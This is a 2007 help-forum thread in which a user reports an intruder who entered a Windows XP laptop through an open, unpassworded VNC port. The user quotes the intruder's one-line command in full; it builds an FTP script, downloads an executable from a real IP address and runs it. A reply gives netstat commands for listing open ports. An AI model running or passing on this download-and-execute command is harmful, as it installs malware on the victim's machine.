Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Unauthorized VNC access;Tried to execute script

Started by damiano , Jan 20 2007 11:19 PM

  • Please log in to reply

#1
damiano
Posted 20 January 2007 - 11:19 PM

damiano

    New Member

  • Member
  • Pip
  • 1 posts
Hi,

I am running on a PentiumM, 1.8G laptop, WinXP 5.1, SP2 with all updates. I have a router/firewall, and opened up the VNC ports for someone to view my computer. Unfortunately, I removed the password to make it easier for our customer. Within 10 minutes after our session and before I closed up the port, I see strange activity on my computer and realize someone else jumped on. They opened up the start>run and tried to execute the following line:

cmd.exe /c del i&echo open 24.144.37.239 17313 > i&echo user 1 1 >> i &echo get 320.exe >> i &echo quit >> i &ftp -n -s:i &320.exe&del i&exit

Whois results in OrgName: Conway Corporation
Traceroute dhcp37-239.cable.conwaycorp.net.

I think I closed down the dos window and port in time, but am not sure.

The above line looks to be getting my pc to download a file from them and then execute it. I am guessing bad things would then happen.

So, can someone let me know the following:

1. What does this do?
2. Should I report this to anyone? Conway Corp?

To me, this is a big deal considering they detected my open port within 15 minutes so they are probing vnc ports and given what I could have lost depending on their next actions. I can get only so much satisfaction by pinging their computer...

And yes, I know the correct answer is to not open up VNC ever again without a password. Lesson learned! To be safe, I backed up my laptop and am now running through your spyware/virus programs to clean up anything.

Thanks for any assistance. I appreciate all of the help from this site and use it often.
  • 0

Advertisements

#2
fozziebear
Posted 21 January 2007 - 06:01 AM

fozziebear

    Member

  • Member
  • PipPip
  • 80 posts
Try running this test

Finding out what Ports are open

TO find out what ports are open/exposed do the following

Start >Run >type "cmd" {enter}
At the command line type "netstat -a" {enter}

The list displayed shows "Listening ports" and established "Who is on the other end" connections to yout computer.

WARNING
This is a list of common Trojan/Backdoor Port numbers
http://www.sans.org/...aq/oddports.php


Who is listening? Use this syntax: netstat -an |find /i "listening"
Save who is listening to a text file: netstat -an |find /i "listening" > c:\openports.txt
Who is established? Use this syntax: netstat -an |find /i "established"


Note: In Windows XP, you can type NETSTAT -O to get a list of all the owning process ID associated with each connection: netstat -ao |find /i "listening"


  • 0
Back to Windows XP, 2000, 2003, NT · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Retired Forums
  3. Windows XP, 2000, 2003, NT

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP